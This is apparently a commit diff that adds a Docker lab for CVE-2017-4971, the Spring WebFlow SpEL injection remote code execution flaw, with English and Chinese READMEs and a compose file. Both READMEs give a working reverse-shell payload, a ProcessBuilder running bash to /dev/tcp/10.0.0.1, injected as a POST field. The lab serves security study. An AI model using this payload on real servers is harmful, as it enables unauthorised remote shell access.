first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/spring/CVE-2017-4971/1.png
+++ b/spring/CVE-2017-4971/1.png
--- a/spring/CVE-2017-4971/2.png
+++ b/spring/CVE-2017-4971/2.png
--- a/spring/CVE-2017-4971/3.png
+++ b/spring/CVE-2017-4971/3.png
--- a/spring/CVE-2017-4971/4.png
+++ b/spring/CVE-2017-4971/4.png
--- a/spring/CVE-2017-4971/5.png
+++ b/spring/CVE-2017-4971/5.png
--- a/spring/CVE-2017-4971/README.md
+++ b/spring/CVE-2017-4971/README.md
@@ -0,0 +1,48 @@
+# Spring WebFlow Remote Code Execution (CVE-2017-4971)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring WebFlow is a framework suitable for developing flow-based applications (such as shopping logic), which can separate the flow definition from the classes and views that implement the flow behavior. In its 2.4.x versions, if we can control the field during data binding, it will lead to a SpEL expression injection vulnerability, ultimately resulting in arbitrary command execution.
+
+Reference links:
+
+- https://threathunter.org/topic/593d562353ab369c55425a90
+- https://pivotal.io/security/cve-2017-4971
+
+## Environment Setup
+
+Execute the following command to start the a web application based on Spring WebFlow 2.4.4:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to see a hotel booking page, which is a simple example provided by Spring WebFlow.
+
+## Vulnerability Reproduce
+
+First, visit `http://your-ip:8080/login` and log in to the system using any of the accounts/passwords given on the left side of the page:
+
+![](1.png)
+
+Then visit the hotel with id 1 at `http://your-ip:8080/hotels/1`, click the "Book Hotel" button, fill in the relevant information, and click "Process" (from this step, WebFlow officially begins):
+
+![](2.png)
+
+Then click "Confirm":
+
+![](3.png)
+
+At this point, intercept the request and capture a POST data packet. We add a field to it (which is the reverse shell POC):
+
+```
+_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
+```
+
+![](4.png)
+
+(Note: Don't forget to URL encode)
+
+Successfully executed, gaining shell access:
+
+![](5.png)
--- a/spring/CVE-2017-4971/README.zh-cn.md
+++ b/spring/CVE-2017-4971/README.zh-cn.md
@@ -0,0 +1,46 @@
+# Spring WebFlow 远程代码执行漏洞（CVE-2017-4971）
+
+Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。
+
+参考链接：
+
+- https://threathunter.org/topic/593d562353ab369c55425a90
+- https://pivotal.io/security/cve-2017-4971
+
+## 测试环境
+
+执行如下命令启动一个基于Spring WebFlow 2.4.4的Web应用：
+
+```
+docker compose up -d
+```
+
+等待环境启动后，访问`http://your-ip:8080`，将看到一个酒店预订的页面，这是spring-webflow官方给的简单示例。
+
+## 漏洞复现
+
+首先访问`http://your-ip:8080/login`，用页面左边给出的任意一个账号/密码登录系统：
+
+![](1.png)
+
+然后访问id为1的酒店`http://your-ip:8080/hotels/1`，点击预订按钮"Book Hotel"，填写相关信息后点击"Process"（从这一步，其实WebFlow就正式开始了）：
+
+![](2.png)
+
+再点击确认"Confirm"：
+
+![](3.png)
+
+此时抓包，抓到一个POST数据包，我们向其中添加一个字段（也就是反弹shell的POC）：
+
+```
+_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
+```
+
+![](4.png)
+
+（注意：别忘记URL编码）
+
+成功执行，获得shell：
+
+![](5.png)
--- a/spring/CVE-2017-4971/docker-compose.yml
+++ b/spring/CVE-2017-4971/docker-compose.yml
@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-webflow:2.4.4
+   ports:
+    - "8080:8080"